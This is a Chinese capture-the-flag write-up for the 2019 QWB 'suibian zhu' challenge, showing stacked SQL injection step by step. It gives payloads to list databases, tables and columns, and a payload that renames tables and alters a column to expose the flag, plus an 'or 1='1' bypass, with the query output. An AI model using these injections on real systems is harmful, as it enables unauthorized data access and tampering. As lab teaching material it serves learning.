[强网杯 2019]随便注 堆叠注入
11/20/2020
多云 轻松
.-------------------------------------------------------------------.
所谓堆叠注入,就是一次性执行多条查询语句
获取数据库
?inject=1';show databases;--+
[OUTPUT]:
array(1) {
[0]=>
string(11) "ctftraining"
}
array(1) {
[0]=>
string(18) "information_schema"
}
array(1) {
[0]=>
string(5) "mysql"
}
array(1) {
[0]=>
string(18) "performance_schema"
}
array(1) {
[0]=>
string(9) "supersqli"
}
array(1) {
[0]=>
string(4) "test"
}
看到了所有的数据库
查看数据表
?inject=1';show tables;--+
[OUTPUT]:
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}
查看字段信息
?inject=1';show columns from `1919810931114514`; --+
[OUTPUT]:
array(6) {
[0]=>
string(4) "flag"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
原题目查询的数据表为words。既然没过滤 alert 和 rename,那就可以把表和列改名。先把 words 改为其他,再把1919810931114514改为 words,然后把新的 words 表里的 flag 列改为 id ,这样就可以直接查询 flag 了
payload如下:
-1';
rename table `words` to `test`;
rename table `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);
show columns from words;--+
# ALTER TABLE tiger (表名) CHANGE tigername(要修改的列) name (修改后的列名) VARCHAR(20)(类型);
使用 /?inject=1’ or 1='1 访问一下即可获得 flag
MySQL中反引号和单引号的区别与用法
MySql 中用一对反引号来标注 SQL 语句中的标识,如数据库名、表名、字段名等
引号则用来标注语句中所引用的字符型常量或日期/时间型常量,即字段值
例如:
select * from `username` where `name`="peri0d"
ps:原来desc 可以查看数据表的结构!!!